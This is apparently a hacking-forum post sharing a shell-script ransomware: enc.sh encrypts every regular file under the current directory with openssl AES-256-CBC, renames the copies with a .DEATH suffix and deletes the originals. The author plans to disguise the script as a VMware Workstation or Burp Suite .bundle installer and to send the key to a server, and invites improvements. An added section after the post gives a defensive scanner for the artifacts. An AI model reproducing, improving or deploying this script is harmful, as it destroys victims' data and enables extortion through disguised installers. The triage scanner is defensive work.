A ransomware that follows the UNIX philosophy
by Someone1611 - Monday December 16, 2024 at 04:37 PM
Not really a ransomware, just a shell script that calls openssl to encrypt files with AES-256-CBC.
I haven't learned to walk through directories using C, but today I remembered a tool to walk through directories: du!
This morning, I figured out by myself how to do rm -rf on Plan 9, and it was easy: step into the directory you want to delete, and make the output of du -a | awk '{ print $2 }' the argument of the rm command:

rm `{du -a | awk '{ print $2 }'}

(on UNIX, it is `command`, but you can't remove directories using rm directory, you have to use rm -rf)

Then I had an idea about a shell script that can be faked as the .bundle file for installing VMware Workstation or Burp Suite...
The script will read 128 bytes from /dev/urandom and hash it two times using sha256 to generate a "password", walk through directories, use openssl to encrypt all regular files, and then submit the key to the server. I haven't implemented the key-submitting part, and currently the key is saved to /tmp/k.txt (to ease my testing of decryption), but the script I post here will be enough to get you started.

If you have any ideas to improve it, let me know! The tab is not displayed, sorry for that.

enc.sh:
key="$(dd if=/dev/urandom bs=128 count=1 2>/dev/null | openssl dgst -sha256 | openssl dgst -sha256 | awk '{ print $2 }')"
echo $key > /tmp/k.txt
for i in `du -a | awk '{ print $2 }'`; do
if [ -f $i ]; then
openssl enc -aes-256-cbc -salt -pbkdf2 -in $i -out $i.DEATH -k $key
rm -f $i &
fi
done

dec.sh:
key=$(cat /tmp/k.txt)
for i in `du -a | awk '{ print $2 }'`; do
if [ -f $i ]; then
openssl enc -d -aes-256-cbc -salt -pbkdf2 -in $i -out ${i%.DEATH} -k $key
rm -f $i &
fi
done

I used openssl for hashing sha256 because cksum is not the same on GNU and BSD, and the name of their sha256 sum is not the same. The utility openssl is guaranteed to be available on every UNIX variant.
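
For triage, the script above leaves recognizable artifacts: files renamed with a ".DEATH" suffix that begin with the 8-byte "Salted__" magic written by password-based `openssl enc`, and a key file holding one 64-hex-character line. The scanner below is an added example, not part of the original post; its function names and sample files are constructed for illustration.

```shell
#!/bin/sh
# Added triage example, not code from the post. It looks for the artifacts the
# posted enc.sh leaves behind: files with a ".DEATH" suffix whose first 8 bytes
# are the "Salted__" magic that password-based `openssl enc` writes, and a key
# file holding one 64-hex-character line (the post's /tmp/k.txt).

SALTED_HEX=53616c7465645f5f   # "Salted__" in hex

# scan_tree DIR [SUFFIX]: print every regular file under DIR that has the
# suffix AND the OpenSSL salt header. find -exec keeps odd file names intact.
scan_tree() {
    find "$1" -type f -name "*${2:-.DEATH}" -exec sh -c '
        magic=$1; shift
        for f do
            head8=$(od -An -tx1 -N8 "$f" | tr -d " \n")
            [ "$head8" = "$magic" ] && printf "%s\n" "$f"
        done
        exit 0' sh "$SALTED_HEX" {} +
}

# key_file_looks_like_post FILE: succeed if FILE contains a line that is
# exactly 64 lowercase hex characters, the format enc.sh writes its key in.
key_file_looks_like_post() {
    [ -f "$1" ] && grep -Eq '^[0-9a-f]{64}$' "$1"
}

# make_constructed_sample DIR: constructed fixture for exercising the scanner.
make_constructed_sample() {
    mkdir -p "$1/sub dir"
    printf 'Salted__AAAAAAAAconstructed-ciphertext' > "$1/sub dir/report.txt.DEATH"
    printf 'plain text, wrong header' > "$1/decoy.DEATH"      # suffix only
    printf 'Salted__AAAAAAAAother tool output' > "$1/backup.enc"  # header only
    printf '%064d\n' 0 > "$1/k.txt"                           # constructed key line
}

# Usage: sh triage.sh DIR [SUFFIX]
if [ "$#" -gt 0 ]; then scan_tree "$@"; fi
```

Requiring both the suffix and the header keeps the scanner from flagging legitimate `openssl enc` output or unrelated files that happen to share the extension. A hit alongside a surviving key file means the data is recoverable, so preserve that file before any cleanup.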